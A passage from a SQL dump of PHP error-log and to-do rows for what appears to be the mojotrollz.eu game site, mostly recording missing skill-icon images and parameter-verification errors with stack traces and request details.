'/api.php?call=files&cat=skilltree_skills&id=ability_parry.png', 'a:0:{}', 'http://www.mojotrollz.eu/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (815, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: tags Verifier: JSON', '1b6ae0065f29c87475734e6331bb6cc1218314cc', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 183, '#0 /home/web/webdir/mojotrollz/system/api/api.php(43): SYSTEM\\API\\api::do_parameters_opt(Array, Array, 5300, \'search\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.008, '2014-12-21 22:46:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=search&search=&tags=[]', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 11, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (634, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520558006', '1443c4cb9b13644f1ca35ac01cae7799dfc58ef0', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.004, '2014-12-14 02:30:11', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418520558006', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (451, 'Exception', 'Visuals seperate by Type', 'e3956d00992a679a5c1f9ce1b8356d3557f07e8e', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Visuals seperat...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 14:11:22', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Visuals%20seperate%20by%20Type', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (452, 'SYSTEM\\LOG\\ERROR', 'Could not execute prepare statement: Duplicate entry \'\\SYSTEM\\CRON\\cron_log2sqlite\' for key \'PRIMARY\'', 'def756cf9266f269add75947abc17d78b784b2a2', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 38, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'SYSTEM\\\\DBD\\\\SYS_...\', \'INSERT INTO sys...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'SYSTEM\\\\DBD\\\\SYS_...\', \'INSERT INTO sys...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(29): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(20): SYSTEM\\DB\\QP::QI(Array)\n#4 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__system_sai_saimod_sys_cron_action_add(\'\\\\SYSTEM\\\\CRON\\\\cr...\', \'0\', \'0\', \'0\', \'0\', \'0\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.032, '2014-12-13 14:41:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?&sai_mod=.SYSTEM.SAI.saimod_sys_cron&action=add&cls=%5CSYSTEM%5CCRON%5Ccron_log2sqlite&min=0&hour=0&day=0&day_week=0&month=0', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (453, 'Exception', 'Cron reload? saimod reload?', '53b3ffb8c3b405beb5e84f7539f9559dfff3ff6c', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Cron reload? sa...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 14:45:51', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Cron%20reload?%20saimod%20reload?', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (455, 'SYSTEM\\LOG\\ERROR', 'Parameter type missmacht or Missing Verifier. Param: id Verifier: INT', 'b141daa88acc590c77250465ae96dab0da4c82ae', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 156, '#0 /home/web/webdir/mojotrollz/system/api/api.php(38): SYSTEM\\API\\api::do_parameters(Array, Array, 5200, \'insert\', \'\\\\SYSTEM\\\\API\\\\ver...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.008, '2015-01-06 00:38:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_visuals&action=insert&race=1&type=0&id=&name=', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_000000000000000000_00000000000000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36 OPR/25.0.1614.63 (Edition FCD)', 14, b'0', 0, 39, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (456, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_golemthunderclap-png\' found.', 'c5c2fd119b310421153dae5ba5a9769145b027eb', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_golemth...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_golemth...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 22:04:59', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_golemthunderclap-png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (457, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_golemthunderclap.png\' found.', 'c043ca35b590697ce9e14167c7b218c639f0d79b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_golemth...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_golemth...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_golemthunderclap.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 127, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (458, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_sleep.png\' found.', '8e7d70b7a0cb81586589204b270c8c56360ca079', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_sl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_sl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_sleep.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 238, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (459, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_arcane_blink.png\' found.', 'ec15512029fd88fde1b4051c71184b4bbfaafb4d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_arcane_bl...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_arcane_bl...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_arcane_blink.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 121, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (460, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_holybolt.png\' found.', '2d3c96f9dbe43f936fe2651ae9caca4852de5107', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_holy...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_holy...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_holybolt.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 117, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (461, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_innerfire.png\' found.', 'a5d78612ef823cc83fdc38101804ce28e5c95fd2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_inne...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_inne...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.036, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_innerfire.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 228, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (462, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_layonhands.png\' found.', '60b1bfb55b59183e281ac15d5dd9dc0e6949aaff', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_layo...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_layo...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_layonhands.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 195, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (463, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_unyieldingfaith.png\' found.', 'cb08b0af68c72d67d9f26aa7962eafcf80bebb00', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_unyieldin...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_unyieldin...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-13 22:08:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_unyieldingfaith.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (464, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_unyieldingfaith.png\' found.', '57001a25b620f8abcf3fa0ceb18439ee8032015b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_unyi...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_unyi...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_unyieldingfaith.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 109, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (465, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_greaterheal.png\' found.', '1cab3e97585d4ac1400c20e34590d54728fcde57', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_grea...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_grea...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_greaterheal.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 107, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (466, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_sealofwisdom.png\' found.', '429900ef5e99ddce47f565f67bbb4098a221bfe8', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_sealofwisdom.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 103, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (467, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_heal.png\' found.', '1acfbb83a34069342269068543ce3ec10a01e9fd', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_heal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_heal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_heal.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 101, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (468, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_healingaura.png\' found.', '00f1b6ae5c9782cd51aa9790fa700eb5f6909a83', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_heal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_heal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:33:06', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_healingaura.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 99, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, 